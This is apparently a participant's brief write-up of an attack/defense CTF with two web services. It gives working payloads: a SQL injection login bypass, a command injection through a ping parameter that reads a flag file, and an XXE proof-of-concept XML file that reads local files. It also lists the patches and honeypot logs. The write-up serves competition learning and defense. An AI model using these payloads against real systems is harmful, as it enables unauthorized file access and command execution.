wu
I wasn't sure if we were allowed to do wu, but I wrote a brief summary for my own records.
tldr;
attack / defense ctf where you were given 2 web services to defend and attack other teams' instances:
🌟 Mercury Service (Port 8080)
original: vuln.py - login endpoint, flag is in
/home/rta_service/flag.txtvulnerability: sqli bypass + command injection via
/pingexploit:
sqli login with
admin' OR '1'='1→ authenticated and then ping with command injection,targets
/ping?host=127.0.0.1;cat /home/rta_service/flag.txt
patched: added session management, input validation, honeypot traps
🌟 Mars Service (Port 8080)
original: app.py - Unsafe xml parser with
resolve_entities=Truevulnerability: xxe (xml External Entity) injection via file upload
exploit: upload malicious xml to read sensitive files
poc.xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///home/rta_service/flag.txt"> ]> <root> <item>&xxe;</item> </root>
patched: disabled external entities, added input validation
please dont do this at home.
leave a honeypot and a fake flag up since I know they are automate to hit my services. Now I have a bunch of ips 🥀, please use vpn
...
[2025-09-28 03:00:07] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
[2025-09-28 03:00:16] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
[2025-09-28 03:00:18] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
...Last updated